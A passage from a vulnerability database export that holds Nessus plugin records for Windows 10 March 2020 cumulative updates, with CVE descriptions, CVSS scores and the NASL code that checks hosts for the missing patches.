CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. An attacker who had already\n gained execution on the victim system could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how Media Foundation handles objects in\n memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-0867,\n CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when\n Windows Defender Security Center handles certain objects\n in memory. (CVE-2020-0763)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-0879)\n\n - An information disclosure vulnerability exists when the\n Windows Network Driver Interface Specification (NDIS)\n improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Server improperly handles file\n operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when\n Windows Error Reporting improperly handles file\n operations. (CVE-2020-0775)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0801,\n CVE-2020-0807, CVE-2020-0809, CVE-2020-0869)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n succesfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way \n that the Chakra scripting engine handles objects in \n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker could \n execute arbitrary code in the context of the current user. \n An attacker who successfully exploited the vulnerability \n could gain the same user rights as the current user. If \n the current user is logged on with administrative user \n rights, an attacker who successfully exploited the \n vulnerability could take control of an affected system. \n An attacker could then install programs; view, change, \n or delete data; or create new accounts with full user \n rights. (CVE-2020-0811, CVE-2020-0812)\n\n - An information disclosure vulnerability exists when \n Chakra improperly discloses the contents of its memory, \n which could provide an attacker with information to \n further compromise the user\u00e2\u0080\u0099s computer or data. \n (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when \n Microsoft Edge improperly accesses objects in memory. \n The vulnerability could corrupt memory in such a way \n that enables an attacker to execute arbitrary code in \n the context of the current user. An attacker who \n successfully exploited the vulnerability could gain \n the same user rights as the current user. If the current \n user is logged on with administrative user rights, an \n attacker could take control of an affected system. An \n attacker could then install programs; view, change, or \n delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-08323,\n CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, \n CVE-2020-0829,CVE-2020-0831, CVE-2020-0848)\");\n # https://support.microsoft.com/en-us/help/4538461/windows-10-update-kb4538461\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?87f654b6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4538461.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0690\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4538461');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4538461])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:29:51", "description": "The remote Windows host is missing security update 4540689.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the way the Provisioning Runtime validates certain file operations. An attacker who successfully exploited the vulnerability could gain elevated privileges on a victim system. (CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector allows file creation in arbitrary locations. (CVE-2020-0810)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849, CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker who had already gained execution on the victim system could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how Media Foundation handles objects in memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-0867, CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when Windows Defender Security Center handles certain objects in memory. (CVE-2020-0762, CVE-2020-0763)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles file operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0801, CVE-2020-0807, CVE-2020-0809, CVE-2020-0869)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who succesfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0811)\n\n - An information disclosure vulnerability exists when Chakra improperly discloses the contents of its memory, which could provide an attacker with information to further compromise the user\u2019s computer or data. (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0816) \n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-08323, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0831, CVE-2020-0848)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4540689: Windows 10 Version 1803 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0690", "CVE-2020-0762", "CVE-2020-0763", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0775", "CVE-2020-0776", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0793", "CVE-2020-0797", "CVE-2020-0798", "CVE-2020-0799", "CVE-2020-0800", "CVE-2020-0801", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0807", "CVE-2020-0808", "CVE-2020-0809", "CVE-2020-0810", "CVE-2020-0811", "CVE-2020-0813", "CVE-2020-0814", "CVE-2020-0816", "CVE-2020-0819", "CVE-2020-0820", "CVE-2020-0822", "CVE-2020-0823", "CVE-2020-0824", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", "CVE-2020-0831", "CVE-2020-0832", "CVE-2020-08323", "CVE-2020-0833", "CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0841", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0848", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0867", "CVE-2020-0868", "CVE-2020-0869", "CVE-2020-0871", "CVE-2020-0877", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0896", "CVE-2020-0897"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_MAR_4540689.NASL", "href": "https://www.tenable.com/plugins/nessus/134372", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134372);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0690\",\n \"CVE-2020-0762\",\n \"CVE-2020-0763\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0775\",\n \"CVE-2020-0776\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0793\",\n \"CVE-2020-0797\",\n \"CVE-2020-0798\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0801\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0807\",\n \"CVE-2020-0808\",\n \"CVE-2020-0809\",\n \"CVE-2020-0810\",\n \"CVE-2020-0811\",\n \"CVE-2020-0813\",\n \"CVE-2020-0814\",\n \"CVE-2020-0816\",\n \"CVE-2020-0819\",\n \"CVE-2020-0820\",\n \"CVE-2020-0822\",\n \"CVE-2020-0823\",\n \"CVE-2020-0824\",\n \"CVE-2020-0826\",\n \"CVE-2020-0827\",\n \"CVE-2020-0828\",\n \"CVE-2020-0829\",\n \"CVE-2020-0830\",\n \"CVE-2020-0831\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0841\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0848\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n \"CVE-2020-0866\",\n \"CVE-2020-0867\",\n \"CVE-2020-0868\",\n \"CVE-2020-0869\",\n \"CVE-2020-0871\",\n \"CVE-2020-0877\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n \"CVE-2020-0896\",\n \"CVE-2020-0897\"\n );\n script_xref(name:\"MSKB\", value:\"4540689\");\n script_xref(name:\"MSFT\", value:\"MS20-4540689\");\n script_xref(name:\"IAVA\", value:\"2020-A-0214-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4540689: Windows 10 Version 1803 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4540689.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who 